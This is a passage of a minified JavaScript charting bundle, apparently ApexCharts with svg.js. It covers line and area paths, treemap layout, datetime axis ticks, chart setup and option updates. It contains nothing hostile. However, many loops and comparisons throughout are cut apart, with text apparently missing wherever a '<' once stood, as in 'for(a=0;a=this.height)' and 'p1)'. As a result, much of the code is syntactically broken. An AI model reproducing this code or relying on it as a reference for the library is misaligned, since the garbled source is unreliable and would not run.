k=m.globals.isXNumeric?(m.globals.seriesX[i][t]-m.globals.minX)/this.xRatio:r-this.xDivision;c=c+f.line(k,g)+f.move(r,o)+"z"}null===a[n][t]&&(u+=f.move(r,o),c+=f.move(r,g)),"stepline"===v?(u=u+f.line(r,null,"H")+f.line(null,o,"V"),c=c+f.line(r,null,"H")+f.line(null,o,"V")):"straight"===v&&(u+=f.line(r,o),c+=f.line(r,o)),t===a[n].length-2&&(c=c+f.line(r,g)+f.move(r,o)+"z",d.push(u),h.push(c))}return{linePaths:d,areaPaths:h,pX:s,pY:l,linePath:u,areaPath:c}}},{key:"handleNullDataPoints",value:function(e,a,n,i,t){var r=this.w;if(null===e[n][i]&&r.config.markers.showNullDataPoints||1===e[n].length){var o=this.markers.plotChartMarkers(a,t,i+1,this.strokeWidth-r.config.markers.strokeWidth/2,!0);null!==o&&this.elPointsMain.add(o)}}}]),e}();window.TreemapSquared={},window.TreemapSquared.generate=function(){function e(a,n,i,t){this.xoffset=a,this.yoffset=n,this.height=t,this.width=i,this.shortestEdge=function(){return Math.min(this.height,this.width)},this.getCoordinates=function(e){var a,n=[],i=this.xoffset,t=this.yoffset,o=r(e)/this.height,s=r(e)/this.width;if(this.width>=this.height)for(a=0;a=this.height){var i=a/this.height,t=this.width-i;n=new e(this.xoffset+i,this.yoffset,t,this.height)}else{var r=a/this.width,o=this.height-r;n=new e(this.xoffset,this.yoffset+r,this.width,o)}return n}}function a(a,i,t,o,s){return o=void 0===o?0:o,s=void 0===s?0:s,function(e){var a,n,i=[];for(a=0;a=i(t,n))}(a,l=e[0],s)?(a.push(l),n(e.slice(1),a,t,o)):(u=t.cutArea(r(a),o),o.push(t.getCoordinates(a)),n(e,[],u,o)),o;o.push(t.getCoordinates(a))}function i(e,a){var n=Math.min.apply(Math,e),i=Math.max.apply(Math,e),t=r(e);return Math.max(Math.pow(a,2)*i/Math.pow(t,2),Math.pow(t,2)/(Math.pow(a,2)*n))}function t(e){return e&&e.constructor===Array}function r(e){var a,n=0;for(a=0;at-n&&s.width<=r-i){var l=o.rotateAroundCenter(e.node);e.node.setAttribute("transform","rotate(-90 ".concat(l.x," ").concat(l.y,")"))}}},{key:"animateTreemap",value:function(e,a,n,i){var t=new y(this.ctx);t.animateRect(e,{x:a.x,y:a.y,width:a.width,height:a.height},{x:n.x,y:n.y,width:n.width,height:n.height},i,(function(){t.animationCompleted(e)}))}}]),e}(),Ke=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w,this.timeScaleArray=[],this.utc=this.w.config.xaxis.labels.datetimeUTC}return u(e,[{key:"calculateTimeScaleTicks",value:function(e,a){var n=this,i=this.w;if(i.globals.allSeriesCollapsed)return i.globals.labels=[],i.globals.timescaleLabels=[],[];var t=new H(this.ctx),o=(a-e)/864e5;this.determineInterval(o),i.globals.disableZoomIn=!1,i.globals.disableZoomOut=!1,o<.00011574074074074075?i.globals.disableZoomIn=!0:o>5e4&&(i.globals.disableZoomOut=!0);var s=t.getTimeUnitsfromTimestamp(e,a,this.utc),l=i.globals.gridWidth/o,u=l/24,c=u/60,d=c/60,h=Math.floor(24*o),p=Math.floor(1440*o),m=Math.floor(86400*o),f=Math.floor(o),v=Math.floor(o/30),g=Math.floor(o/365),b={minMillisecond:s.minMillisecond,minSecond:s.minSecond,minMinute:s.minMinute,minHour:s.minHour,minDate:s.minDate,minMonth:s.minMonth,minYear:s.minYear},k={firstVal:b,currentMillisecond:b.minMillisecond,currentSecond:b.minSecond,currentMinute:b.minMinute,currentHour:b.minHour,currentMonthDate:b.minDate,currentDate:b.minDate,currentMonth:b.minMonth,currentYear:b.minYear,daysWidthOnXAxis:l,hoursWidthOnXAxis:u,minutesWidthOnXAxis:c,secondsWidthOnXAxis:d,numberOfSeconds:m,numberOfMinutes:p,numberOfHours:h,numberOfDays:f,numberOfMonths:v,numberOfYears:g};switch(this.tickInterval){case"years":this.generateYearScale(k);break;case"months":case"half_year":this.generateMonthScale(k);break;case"months_days":case"months_fortnight":case"days":case"week_days":this.generateDayScale(k);break;case"hours":this.generateHourScale(k);break;case"minutes_fives":case"minutes":this.generateMinuteScale(k);break;case"seconds_tens":case"seconds_fives":case"seconds":this.generateSecondScale(k)}var y=this.timeScaleArray.map((function(e){var a={position:e.position,unit:e.unit,year:e.year,day:e.day?e.day:1,hour:e.hour?e.hour:0,month:e.month+1};return"month"===e.unit?r(r({},a),{},{day:1,value:e.value+1}):"day"===e.unit||"hour"===e.unit?r(r({},a),{},{value:e.value}):"minute"===e.unit?r(r({},a),{},{value:e.value,minute:e.value}):"second"===e.unit?r(r({},a),{},{value:e.value,minute:e.minute,second:e.second}):e}));return y.filter((function(e){var a=1,t=Math.ceil(i.globals.gridWidth/120),r=e.value;void 0!==i.config.xaxis.tickAmount&&(t=i.config.xaxis.tickAmount),y.length>t&&(a=Math.floor(y.length/t));var o=!1,s=!1;switch(n.tickInterval){case"years":"year"===e.unit&&(o=!0);break;case"half_year":a=7,"year"===e.unit&&(o=!0);break;case"months":a=1,"year"===e.unit&&(o=!0);break;case"months_fortnight":a=15,"year"!==e.unit&&"month"!==e.unit||(o=!0),30===r&&(s=!0);break;case"months_days":a=10,"month"===e.unit&&(o=!0),30===r&&(s=!0);break;case"week_days":a=8,"month"===e.unit&&(o=!0);break;case"days":a=1,"month"===e.unit&&(o=!0);break;case"hours":"day"===e.unit&&(o=!0);break;case"minutes_fives":case"seconds_fives":r%5!=0&&(s=!0);break;case"seconds_tens":r%10!=0&&(s=!0)}if("hours"===n.tickInterval||"minutes_fives"===n.tickInterval||"seconds_tens"===n.tickInterval||"seconds_fives"===n.tickInterval){if(!s)return!0}else if((r%a==0||o)&&!s)return!0}))}},{key:"recalcDimensionsBasedOnFormat",value:function(e,a){var n=this.w,i=this.formatDates(e),t=this.removeOverlappingTS(i);n.globals.timescaleLabels=t.slice(),new de(this.ctx).plotCoords()}},{key:"determineInterval",value:function(e){var a=24*e,n=60*a;switch(!0){case e/365>5:this.tickInterval="years";break;case e>800:this.tickInterval="half_year";break;case e>180:this.tickInterval="months";break;case e>90:this.tickInterval="months_fortnight";break;case e>60:this.tickInterval="months_days";break;case e>30:this.tickInterval="week_days";break;case e>2:this.tickInterval="days";break;case a>2.4:this.tickInterval="hours";break;case n>15:this.tickInterval="minutes_fives";break;case n>5:this.tickInterval="minutes";break;case n>1:this.tickInterval="seconds_tens";break;case 60*n>20:this.tickInterval="seconds_fives";break;default:this.tickInterval="seconds"}}},{key:"generateYearScale",value:function(e){var a=e.firstVal,n=e.currentMonth,i=e.currentYear,t=e.daysWidthOnXAxis,r=e.numberOfYears,o=a.minYear,s=0,l=new H(this.ctx),u="year";if(a.minDate>1||a.minMonth>0){var c=l.determineRemainingDaysOfYear(a.minYear,a.minMonth,a.minDate);s=(l.determineDaysOfYear(a.minYear)-c+1)*t,o=a.minYear+1,this.timeScaleArray.push({position:s,value:o,unit:u,year:o,month:k.monthMod(n+1)})}else 1===a.minDate&&0===a.minMonth&&this.timeScaleArray.push({position:s,value:o,unit:u,year:i,month:k.monthMod(n+1)});for(var d=o,h=s,p=0;p1){l=(u.determineDaysOfMonths(i+1,a.minYear)-n+1)*r,s=k.monthMod(i+1);var h=t+d,p=k.monthMod(s),m=s;0===s&&(c="year",m=h,p=1,h+=d+=1),this.timeScaleArray.push({position:l,value:m,unit:c,year:h,month:p})}else this.timeScaleArray.push({position:l,value:s,unit:c,year:t,month:k.monthMod(i)});for(var f=s+1,v=l,g=0,b=1;go.determineDaysOfMonths(a+1,n)?(u=1,s="month",h=a+=1,a):a},d=(24-a.minHour)*t,h=l,p=c(u,n,i);0===a.minHour&&1===a.minDate?(d=0,h=k.monthMod(a.minMonth),s="month",u=a.minDate,r++):1!==a.minDate&&0===a.minHour&&0===a.minMinute&&(d=0,l=a.minDate,h=l,p=c(u=l,n,i)),this.timeScaleArray.push({position:d,value:h,unit:s,year:this._getYear(i,p,0),month:k.monthMod(p),day:u});for(var m=d,f=0;fs.determineDaysOfMonths(a+1,t)&&(f=1,a+=1),{month:a,date:f}},c=function(e,a){return e>s.determineDaysOfMonths(a+1,t)?a+=1:a},d=60-(a.minMinute+a.minSecond/60),h=d*r,p=a.minHour+1,m=p+1;60===d&&(h=0,m=(p=a.minHour)+1);var f=n,v=c(f,i);this.timeScaleArray.push({position:h,value:p,unit:l,day:f,hour:m,year:t,month:k.monthMod(v)});for(var g=h,b=0;b=24&&(m=0,l="day",v=u(f+=1,v).month,v=c(f,v));var y=this._getYear(t,v,0);g=0===m&&0===b?d*r:60*r+g;var x=0===m?f:m;this.timeScaleArray.push({position:g,value:x,unit:l,hour:m,day:f,year:y,month:k.monthMod(v)}),m++}}},{key:"generateMinuteScale",value:function(e){for(var a=e.currentMillisecond,n=e.currentSecond,i=e.currentMinute,t=e.currentHour,r=e.currentDate,o=e.currentMonth,s=e.currentYear,l=e.minutesWidthOnXAxis,u=e.secondsWidthOnXAxis,c=e.numberOfMinutes,d=i+1,h=r,p=o,m=s,f=t,v=(60-n-a/1e3)*u,g=0;g=60&&(d=0,24===(f+=1)&&(f=0)),this.timeScaleArray.push({position:v,value:d,unit:"minute",hour:f,minute:d,day:h,year:this._getYear(m,p,0),month:k.monthMod(p)}),v+=l,d++}},{key:"generateSecondScale",value:function(e){for(var a=e.currentMillisecond,n=e.currentSecond,i=e.currentMinute,t=e.currentHour,r=e.currentDate,o=e.currentMonth,s=e.currentYear,l=e.secondsWidthOnXAxis,u=e.numberOfSeconds,c=n+1,d=i,h=r,p=o,m=s,f=t,v=(1e3-a)/1e3*l,g=0;g=60&&(c=0,++d>=60&&(d=0,24===++f&&(f=0))),this.timeScaleArray.push({position:v,value:c,unit:"second",hour:f,minute:d,second:c,day:h,year:this._getYear(m,p,0),month:k.monthMod(p)}),v+=l,c++}},{key:"createRawDateString",value:function(e,a){var n=e.year;return 0===e.month&&(e.month=1),n+="-"+("0"+e.month.toString()).slice(-2),"day"===e.unit?n+="day"===e.unit?"-"+("0"+a).slice(-2):"-01":n+="-"+("0"+(e.day?e.day:"1")).slice(-2),"hour"===e.unit?n+="hour"===e.unit?"T"+("0"+a).slice(-2):"T00":n+="T"+("0"+(e.hour?e.hour:"0")).slice(-2),"minute"===e.unit?n+=":"+("0"+a).slice(-2):n+=":"+(e.minute?("0"+e.minute).slice(-2):"00"),"second"===e.unit?n+=":"+("0"+a).slice(-2):n+=":00",this.utc&&(n+=".000Z"),n}},{key:"formatDates",value:function(e){var a=this,n=this.w;return e.map((function(e){var i=e.value.toString(),t=new H(a.ctx),r=a.createRawDateString(e,i),o=t.getDate(t.parseDate(r));if(a.utc||(o=t.getDate(t.parseDateWithTimezone(r))),void 0===n.config.xaxis.labels.format){var s="dd MMM",l=n.config.xaxis.labels.datetimeFormatter;"year"===e.unit&&(s=l.year),"month"===e.unit&&(s=l.month),"day"===e.unit&&(s=l.day),"hour"===e.unit&&(s=l.hour),"minute"===e.unit&&(s=l.minute),"second"===e.unit&&(s=l.second),i=t.formatDate(o,s)}else i=t.formatDate(o,n.config.xaxis.labels.format);return{dateString:r,position:e.position,value:i,unit:e.unit,year:e.year,month:e.month}}))}},{key:"removeOverlappingTS",value:function(e){var a,n=this,i=new S(this.ctx),t=!1;e.length>0&&e[0].value&&e.every((function(a){return a.value.length===e[0].value.length}))&&(t=!0,a=i.getTextRects(e[0].value).width);var r=0,o=e.map((function(o,s){if(s>0&&n.w.config.xaxis.labels.hideOverlappingLabels){var l=t?a:i.getTextRects(e[r].value).width,u=e[r].position;return o.position>u+l+10?(r=s,o):null}return o}));return o.filter((function(e){return null!==e}))}},{key:"_getYear",value:function(e,a,n){return e+Math.floor(a/12)+n}}]),e}(),De=function(){function e(a,n){s(this,e),this.ctx=n,this.w=n.w,this.el=a}return u(e,[{key:"setupElements",value:function(){var e=this.w.globals,a=this.w.config,n=a.chart.type;e.axisCharts=["line","area","bar","rangeBar","candlestick","boxPlot","scatter","bubble","radar","heatmap","treemap"].indexOf(n)>-1,e.xyCharts=["line","area","bar","rangeBar","candlestick","boxPlot","scatter","bubble"].indexOf(n)>-1,e.isBarHorizontal=("bar"===a.chart.type||"rangeBar"===a.chart.type||"boxPlot"===a.chart.type)&&a.plotOptions.bar.horizontal,e.chartClass=".apexcharts"+e.chartID,e.dom.baseEl=this.el,e.dom.elWrap=document.createElement("div"),S.setAttrs(e.dom.elWrap,{id:e.chartClass.substring(1),class:"apexcharts-canvas "+e.chartClass.substring(1)}),this.el.appendChild(e.dom.elWrap),e.dom.Paper=new window.SVG.Doc(e.dom.elWrap),e.dom.Paper.attr({class:"apexcharts-svg","xmlns:data":"ApexChartsNS",transform:"translate(".concat(a.chart.offsetX,", ").concat(a.chart.offsetY,")")}),e.dom.Paper.node.style.background=a.chart.background,this.setSVGDimensions(),e.dom.elGraphical=e.dom.Paper.group().attr({class:"apexcharts-inner apexcharts-graphical"}),e.dom.elAnnotations=e.dom.Paper.group().attr({class:"apexcharts-annotations"}),e.dom.elDefs=e.dom.Paper.defs(),e.dom.elLegendWrap=document.createElement("div"),e.dom.elLegendWrap.classList.add("apexcharts-legend"),e.dom.elWrap.appendChild(e.dom.elLegendWrap),e.dom.Paper.add(e.dom.elGraphical),e.dom.elGraphical.add(e.dom.elDefs)}},{key:"plotChartType",value:function(e,a){var n=this.w,i=n.config,t=n.globals,r={series:[],i:[]},o={series:[],i:[]},s={series:[],i:[]},l={series:[],i:[]},u={series:[],i:[]},c={series:[],i:[]},d={series:[],i:[]};t.series.map((function(a,h){var p=0;void 0!==e[h].type?("column"===e[h].type||"bar"===e[h].type?(t.series.length>1&&i.plotOptions.bar.horizontal&&console.warn("Horizontal bars are not supported in a mixed/combo chart. Please turn off `plotOptions.bar.horizontal`"),u.series.push(a),u.i.push(h),p++,n.globals.columnSeries=u.series):"area"===e[h].type?(o.series.push(a),o.i.push(h),p++):"line"===e[h].type?(r.series.push(a),r.i.push(h),p++):"scatter"===e[h].type?(s.series.push(a),s.i.push(h)):"bubble"===e[h].type?(l.series.push(a),l.i.push(h),p++):"candlestick"===e[h].type?(c.series.push(a),c.i.push(h),p++):"boxPlot"===e[h].type?(d.series.push(a),d.i.push(h),p++):console.warn("You have specified an unrecognized chart type. Available types for this property are line/area/column/bar/scatter/bubble"),p>1&&(t.comboCharts=!0)):(r.series.push(a),r.i.push(h))}));var h=new ze(this.ctx,a),p=new we(this.ctx,a);this.ctx.pie=new Pe(this.ctx);var m=new Te(this.ctx);this.ctx.rangeBar=new O(this.ctx,a);var f=new Be(this.ctx),v=[];if(t.comboCharts){if(o.series.length>0&&v.push(h.draw(o.series,"area",o.i)),u.series.length>0)if(n.config.chart.stacked){var g=new Ae(this.ctx,a);v.push(g.draw(u.series,u.i))}else this.ctx.bar=new _(this.ctx,a),v.push(this.ctx.bar.draw(u.series,u.i));if(r.series.length>0&&v.push(h.draw(r.series,"line",r.i)),c.series.length>0&&v.push(p.draw(c.series,c.i)),d.series.length>0&&v.push(p.draw(d.series,d.i)),s.series.length>0){var b=new ze(this.ctx,a,!0);v.push(b.draw(s.series,"scatter",s.i))}if(l.series.length>0){var k=new ze(this.ctx,a,!0);v.push(k.draw(l.series,"bubble",l.i))}}else switch(i.chart.type){case"line":v=h.draw(t.series,"line");break;case"area":v=h.draw(t.series,"area");break;case"bar":i.chart.stacked?v=new Ae(this.ctx,a).draw(t.series):(this.ctx.bar=new _(this.ctx,a),v=this.ctx.bar.draw(t.series));break;case"candlestick":case"boxPlot":v=new we(this.ctx,a).draw(t.series);break;case"rangeBar":v=this.ctx.rangeBar.draw(t.series);break;case"heatmap":v=new je(this.ctx,a).draw(t.series);break;case"treemap":v=new Re(this.ctx,a).draw(t.series);break;case"pie":case"donut":case"polarArea":v=this.ctx.pie.draw(t.series);break;case"radialBar":v=m.draw(t.series);break;case"radar":v=f.draw(t.series);break;default:v=h.draw(t.series)}return v}},{key:"setSVGDimensions",value:function(){var e=this.w.globals,a=this.w.config;e.svgWidth=a.chart.width,e.svgHeight=a.chart.height;var n=k.getDimensions(this.el),i=a.chart.width.toString().split(/[0-9]+/g).pop();"%"===i?k.isNumber(n[0])&&(0===n[0].width&&(n=k.getDimensions(this.el.parentNode)),e.svgWidth=n[0]*parseInt(a.chart.width,10)/100):"px"!==i&&""!==i||(e.svgWidth=parseInt(a.chart.width,10));var t=a.chart.height.toString().split(/[0-9]+/g).pop();if("auto"!==e.svgHeight&&""!==e.svgHeight)if("%"===t){var r=k.getDimensions(this.el.parentNode);e.svgHeight=r[1]*parseInt(a.chart.height,10)/100}else e.svgHeight=parseInt(a.chart.height,10);else e.axisCharts?e.svgHeight=e.svgWidth/1.61:e.svgHeight=e.svgWidth/1.2;if(e.svgWidth<0&&(e.svgWidth=0),e.svgHeight<0&&(e.svgHeight=0),S.setAttrs(e.dom.Paper.node,{width:e.svgWidth,height:e.svgHeight}),"%"!==t){var o=a.chart.sparkline.enabled?0:e.axisCharts?a.chart.parentHeightOffset:0;e.dom.Paper.node.parentNode.parentNode.style.minHeight=e.svgHeight+o+"px"}e.dom.elWrap.style.width=e.svgWidth+"px",e.dom.elWrap.style.height=e.svgHeight+"px"}},{key:"shiftGraphPosition",value:function(){var e=this.w.globals,a=e.translateY,n={transform:"translate("+e.translateX+", "+a+")"};S.setAttrs(e.dom.elGraphical.node,n)}},{key:"resizeNonAxisCharts",value:function(){var e=this.w,a=e.globals,n=0,i=e.config.chart.sparkline.enabled?1:15;i+=e.config.grid.padding.bottom,"top"!==e.config.legend.position&&"bottom"!==e.config.legend.position||!e.config.legend.show||e.config.legend.floating||(n=new pe(this.ctx).legendHelpers.getLegendBBox().clwh+10);var t=e.globals.dom.baseEl.querySelector(".apexcharts-radialbar, .apexcharts-pie"),r=2.05*e.globals.radialSize;if(t&&!e.config.chart.sparkline.enabled&&0!==e.config.plotOptions.radialBar.startAngle){var o=k.getBoundingClientRect(t);r=o.bottom;var s=o.bottom-o.top;r=Math.max(2.05*e.globals.radialSize,s)}var l=r+a.translateY+n+i;a.dom.elLegendForeign&&a.dom.elLegendForeign.setAttribute("height",l),a.dom.elWrap.style.height=l+"px",S.setAttrs(a.dom.Paper.node,{height:l}),a.dom.Paper.node.parentNode.parentNode.style.minHeight=l+"px"}},{key:"coreCalculations",value:function(){new Q(this.ctx).init()}},{key:"resetGlobals",value:function(){var e=this,a=function(){return e.w.config.series.map((function(e){return[]}))},n=new G,i=this.w.globals;n.initGlobalVars(i),i.seriesXvalues=a(),i.seriesYvalues=a()}},{key:"isMultipleY",value:function(){if(this.w.config.yaxis.constructor===Array&&this.w.config.yaxis.length>1)return this.w.globals.isMultipleYAxis=!0,!0}},{key:"xySettings",value:function(){var e=null,a=this.w;if(a.globals.axisCharts){if("back"===a.config.xaxis.crosshairs.position&&new ie(this.ctx).drawXCrosshairs(),"back"===a.config.yaxis[0].crosshairs.position&&new ie(this.ctx).drawYCrosshairs(),"datetime"===a.config.xaxis.type&&void 0===a.config.xaxis.labels.formatter){this.ctx.timeScale=new Ke(this.ctx);var n=[];isFinite(a.globals.minX)&&isFinite(a.globals.maxX)&&!a.globals.isBarHorizontal?n=this.ctx.timeScale.calculateTimeScaleTicks(a.globals.minX,a.globals.maxX):a.globals.isBarHorizontal&&(n=this.ctx.timeScale.calculateTimeScaleTicks(a.globals.minY,a.globals.maxY)),this.ctx.timeScale.recalcDimensionsBasedOnFormat(n)}e=new A(this.ctx).getCalculatedRatios()}return e}},{key:"updateSourceChart",value:function(e){this.ctx.w.globals.selection=void 0,this.ctx.updateHelpers._updateOptions({chart:{selection:{xaxis:{min:e.w.globals.minX,max:e.w.globals.maxX}}}},!1,!1)}},{key:"setupBrushHandler",value:function(){var e=this,a=this.w;if(a.config.chart.brush.enabled&&"function"!=typeof a.config.chart.events.selection){var n=a.config.chart.brush.targets||[a.config.chart.brush.target];n.forEach((function(a){var n=ApexCharts.getChartByID(a);n.w.globals.brushSource=e.ctx,"function"!=typeof n.w.config.chart.events.zoomed&&(n.w.config.chart.events.zoomed=function(){e.updateSourceChart(n)}),"function"!=typeof n.w.config.chart.events.scrolled&&(n.w.config.chart.events.scrolled=function(){e.updateSourceChart(n)})})),a.config.chart.events.selection=function(e,i){n.forEach((function(e){var n=ApexCharts.getChartByID(e),t=k.clone(a.config.yaxis);if(a.config.chart.brush.autoScaleYaxis&&1===n.w.globals.series.length){var o=new X(n);t=o.autoScaleY(n,t,i)}var s=n.w.config.yaxis.reduce((function(e,a,i){return[].concat(v(e),[r(r({},n.w.config.yaxis[i]),{},{min:t[0].min,max:t[0].max})])}),[]);n.ctx.updateHelpers._updateOptions({xaxis:{min:i.xaxis.min,max:i.xaxis.max},yaxis:s},!1,!1,!1,!1)}))}}}}]),e}(),_e=function(){function e(a){s(this,e),this.ctx=a,this.w=a.w}return u(e,[{key:"_updateOptions",value:function(e){var a=this,n=arguments.length>1&&void 0!==arguments[1]&&arguments[1],i=!(arguments.length>2&&void 0!==arguments[2])||arguments[2],t=!(arguments.length>3&&void 0!==arguments[3])||arguments[3],r=arguments.length>4&&void 0!==arguments[4]&&arguments[4];return new Promise((function(s){var l=[a.ctx];t&&(l=a.ctx.getSyncedCharts()),a.ctx.w.globals.isExecCalled&&(l=[a.ctx],a.ctx.w.globals.isExecCalled=!1),l.forEach((function(t,u){var c=t.w;if(c.globals.shouldAnimate=i,n||(c.globals.resized=!0,c.globals.dataChanged=!0,i&&t.series.getPreviousPaths()),e&&"object"===o(e)&&(t.config=new F(e),e=A.extendArrayProps(t.config,e,c),t.w.globals.chartID!==a.ctx.w.globals.chartID&&delete e.series,c.config=k.extend(c.config,e),r&&(c.globals.lastXAxis=e.xaxis?k.clone(e.xaxis):[],c.globals.lastYAxis=e.yaxis?k.clone(e.yaxis):[],c.globals.initialConfig=k.extend({},c.config),c.globals.initialSeries=k.clone(c.config.series),e.series))){for(var d=0;d2&&void 0!==arguments[2]&&arguments[2];return new Promise((function(t){var r,o=n.w;return o.globals.shouldAnimate=a,o.globals.dataChanged=!0,a&&n.ctx.series.getPreviousPaths(),o.globals.axisCharts?(0===(r=e.map((function(e,a){return n._extendSeries(e,a)}))).length&&(r=[{data:[]}]),o.config.series=r):o.config.series=e.slice(),i&&(o.globals.initialSeries=k.clone(o.config.series)),n.ctx.update().then((function(){t(n.ctx)}))}))}},{key:"_extendSeries",value:function(e,a){var n=this.w,i=n.config.series[a];return r(r({},n.config.series[a]),{},{name:e.name?e.name:i&&i.name,color:e.color?e.color:i&&i.color,type:e.type?e.type:i&&i.type,data:e.data?e.data:i&&i.data})}},{key:"toggleDataPointSelection",value:function(e,a){var n=this.w,i=null,t=".apexcharts-series[data\\:realIndex='".concat(e,"']");return n.globals.axisCharts?i=n.globals.dom.Paper.select("".concat(t," path[j='").concat(a,"'], ").concat(t," circle[j='").concat(a,"'], ").concat(t," rect[j='").concat(a,"']")).members[0]:void 0===a&&(i=n.globals.dom.Paper.select("".concat(t," path[j='").concat(e,"']")).members[0],"pie"!==n.config.chart.type&&"polarArea"!==n.config.chart.type&&"donut"!==n.config.chart.type||this.ctx.pie.pieClicked(e)),i?(new S(this.ctx).pathMouseDown(i,null),i.node?i.node:null):(console.warn("toggleDataPointSelection: Element not found"),null)}},{key:"forceXAxisUpdate",value:function(e){var a=this.w;if(["min","max"].forEach((function(n){void 0!==e.xaxis[n]&&(a.config.xaxis[n]=e.xaxis[n],a.globals.lastXAxis[n]=e.xaxis[n])})),e.xaxis.categories&&e.xaxis.categories.length&&(a.config.xaxis.categories=e.xaxis.categories),a.config.xaxis.convertedCatToNumeric){var n=new V(e);e=n.convertCatToNumericXaxis(e,this.ctx)}return e}},{key:"forceYAxisUpdate",value:function(e){var a=this.w;return a.config.chart.stacked&&"100%"===a.config.chart.stackType&&(Array.isArray(e.yaxis)?e.yaxis.forEach((function(a,n){e.yaxis[n].min=0,e.yaxis[n].max=100})):(e.yaxis.min=0,e.yaxis.max=100)),e}},{key:"revertDefaultAxisMinMax",value:function(e){var a=this,n=this.w,i=n.globals.lastXAxis,t=n.globals.lastYAxis;e&&e.xaxis&&(i=e.xaxis),e&&e.yaxis&&(t=e.yaxis),n.config.xaxis.min=i.min,n.config.xaxis.max=i.max;n.config.yaxis.map((function(e,i){n.globals.zoomed||void 0!==t[i]?function(e){void 0!==t[e]&&(n.config.yaxis[e].min=t[e].min,n.config.yaxis[e].max=t[e].max)}(i):void 0!==a.ctx.opts.yaxis[i]&&(e.min=a.ctx.opts.yaxis[i].min,e.max=a.ctx.opts.yaxis[i].max)}))}}]),e}();Ne="undefined"!=typeof window?window:void 0,Ee=function(e,a){var n=(void 0!==this?this:e).SVG=function(e){if(n.supported)return e=new n.Doc(e),n.parser.draw||n.prepare(),e};if(n.ns="http://www.w3.org/2000/svg",n.xmlns="http://www.w3.org/2000/xmlns/",n.xlink="http://www.w3.org/1999/xlink",n.svgjs="http://svgjs.dev",n.supported=!0,!n.supported)return!1;n.did=1e3,n.eid=function(e){return"Svgjs"+d(e)+n.did++},n.create=function(e){var n=a.createElementNS(this.ns,e);return n.setAttribute("id",this.eid(e)),n},n.extend=function(){var e,a;a=(e=[].slice.call(arguments)).pop();for(var i=e.length-1;i>=0;i--)if(e[i])for(var t in a)e[i].prototype[t]=a[t];n.Set&&n.Set.inherit&&n.Set.inherit()},n.invent=function(e){var a="function"==typeof e.create?e.create:function(){this.constructor.call(this,n.create(e.create))};return e.inherit&&(a.prototype=new e.inherit),e.extend&&n.extend(a,e.extend),e.construct&&n.extend(e.parent||n.Container,e.construct),a},n.adopt=function(a){return a?a.instance?a.instance:((i="svg"==a.nodeName?a.parentNode instanceof e.SVGElement?new n.Nested:new n.Doc:"linearGradient"==a.nodeName?new n.Gradient("linear"):"radialGradient"==a.nodeName?new n.Gradient("radial"):n[d(a.nodeName)]?new(n[d(a.nodeName)]):new n.Element(a)).type=a.nodeName,i.node=a,a.instance=i,i instanceof n.Doc&&i.namespace().defs(),i.setData(JSON.parse(a.getAttribute("svgjs:data"))||{}),i):null;var i},n.prepare=function(){var e=a.getElementsByTagName("body")[0],i=(e?new n.Doc(e):n.adopt(a.documentElement).nested()).size(2,0);n.parser={body:e||a.documentElement,draw:i.style("opacity:0;position:absolute;left:-100%;top:-100%;overflow:hidden").node,poly:i.polyline().node,path:i.path().node,native:n.create("svg")}},n.parser={native:n.create("svg")},a.addEventListener("DOMContentLoaded",(function(){n.parser.draw||n.prepare()}),!1),n.regex={numberAndUnit:/^([+-]?(\d+(\.\d*)?|\.\d+)(e[+-]?\d+)?)([a-z%]*)$/i,hex:/^#?([a-f\d]{2})([a-f\d]{2})([a-f\d]{2})$/i,rgb:/rgb\((\d+),(\d+),(\d+)\)/,reference:/#([a-z0-9\-_]+)/i,transforms:/\)\s*,?\s*/,whitespace:/\s/g,isHex:/^#[a-f0-9]{3,6}$/i,isRgb:/^rgb\(/,isCss:/[^:]+:[^;]+;?/,isBlank:/^(\s+)?$/,isNumber:/^[+-]?(\d+(\.\d*)?|\.\d+)(e[+-]?\d+)?$/i,isPercent:/^-?[\d\.]+%$/,isImage:/\.(jpg|jpeg|png|gif|svg)(\?[^=]+.*)?/i,delimiter:/[\s,]+/,hyphen:/([^e])\-/gi,pathLetters:/[MLHVCSQTAZ]/gi,isPathLetter:/[MLHVCSQTAZ]/i,numbersWithDots:/((\d?\.\d+(?:e[+-]?\d+)?)((?:\.\d+(?:e[+-]?\d+)?)+))+/gi,dots:/\./g},n.utils={map:function(e,a){for(var n=e.length,i=[],t=0;t1?1:e,new n.Color({r:~~(this.r+(this.destination.r-this.r)*e),g:~~(this.g+(this.destination.g-this.g)*e),b:~~(this.b+(this.destination.b-this.b)*e)})):this}}),n.Color.test=function(e){return e+="",n.regex.isHex.test(e)||n.regex.isRgb.test(e)},n.Color.isRgb=function(e){return e&&"number"==typeof e.r&&"number"==typeof e.g&&"number"==typeof e.b},n.Color.isColor=function(e){return n.Color.isRgb(e)||n.Color.test(e)},n.Array=function(e,a){0==(e=(e||[]).valueOf()).length&&a&&(e=a.valueOf()),this.value=this.parse(e)},n.extend(n.Array,{toString:function(){return this.value.join(" ")},valueOf:function(){return this.value},parse:function(e){return e=e.valueOf(),Array.isArray(e)?e:this.split(e)}}),n.PointArray=function(e,a){n.Array.call(this,e,a||[[0,0]])},n.PointArray.prototype=new n.Array,n.PointArray.prototype.constructor=n.PointArray;for(var i={M:function(e,a,n){return a.x=n.x=e[0],a.y=n.y=e[1],["M",a.x,a.y]},L:function(e,a){return a.x=e[0],a.y=e[1],["L",e[0],e[1]]},H:function(e,a){return a.x=e[0],["H",e[0]]},V:function(e,a){return a.y=e[0],["V",e[0]]},C:function(e,a){return a.x=e[4],a.y=e[5],["C",e[0],e[1],e[2],e[3],e[4],e[5]]},Q:function(e,a){return a.x=e[2],a.y=e[3],["Q",e[0],e[1],e[2],e[3]]},Z:function(e,a,n){return a.x=n.x,a.y=n.y,["Z"]}},t="mlhvqtcsaz".split(""),r=0,s=t.length;rl);return r},bbox:function(){return n.parser.draw||n.prepare(),n.parser.path.setAttribute("d",this.toString()),n.parser.path.getBBox()}}),n.Number=n.invent({create:function(e,a){this.value=0,this.unit=a||"","number"==typeof e?this.value=isNaN(e)?0:isFinite(e)?e:e<0?-34e37:34e37:"string"==typeof e?(a=e.match(n.regex.numberAndUnit))&&(this.value=parseFloat(a[1]),"%"==a[5]?this.value/=100:"s"==a[5]&&(this.value*=1e3),this.unit=a[5]):e instanceof n.Number&&(this.value=e.valueOf(),this.unit=e.unit)},extend:{toString:function(){return("%"==this.unit?~~(1e8*this.value)/1e6:"s"==this.unit?this.value/1e3:this.value)+this.unit},toJSON:function(){return this.toString()},valueOf:function(){return this.value},plus:function(e){return e=new n.Number(e),new 